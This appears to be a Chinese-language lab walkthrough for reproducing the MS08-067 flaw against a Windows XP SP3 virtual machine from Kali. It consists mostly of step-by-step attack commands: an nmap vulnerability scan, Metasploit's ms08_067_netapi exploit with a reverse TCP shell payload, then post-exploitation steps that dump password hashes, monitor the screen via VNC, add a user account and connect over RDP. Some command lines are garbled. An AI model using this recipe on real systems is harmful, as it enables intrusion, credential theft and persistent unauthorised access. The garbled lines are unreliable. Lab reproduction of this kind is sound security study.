Windows xp Ms08067漏洞复现

准备工作：
虚拟机
kali
Windows xp sp3中文版
先ping双方的ip，以确保双方的网络可以互通
nmap扫描Windows
命令：
cd /usr/share/nmap/scripts
nmap --script=vuln 192.168.XXX.XXX
扫描后有漏洞ms08067

用mts进行攻击
先找漏洞利用：
search 08_067

运用漏洞：
use exploit/windowsexploit/windows/smb/ms08_067_netapi
看参数：
show options

调整参数：
set lhost 192.168.XXX.XXX（本机地址）
set target 34（一定要设置target为34，不要让他自己识别，那样会导致利用不成功）

也可以所有参数都配置：
use exploit/windows/smb/ms08_067_netapi
set set rport 445rhosts （目标地址）
set payload windows/shell/reverse_tcp
set lhost （本机地址）
set target 34

同时靶机符合以下参数：
1、安装完成后，在控制面板中关闭防火墙，关闭自动更新。

2、设置一个文件夹共享，点击我的文档–共享文档处右键— 共享和安全—共享—在网络上共享这个文件夹（共享名可以默认）—确定

3、保证Computer Browser、Server、WorkStation三个服务是开启状态，如果利用的时候失败，这三个服务可能关闭，需要手动打开。

4、保存快照（这个漏洞有时利用成功，有时利用不成功，所以建议保存快照）

攻击靶机：
exploit

就成功获取靶机权限进入靶机：

先截个屏看一下：
screenshot

查密码：
hashdump

进入系统：
shell
看ip：
ipconfig

监视屏幕：
run vnc

添加用户：
net user root123 123456

远程登录：(前提是靶机开放3389端口)
rdesktop -a 192.168.124.132:3389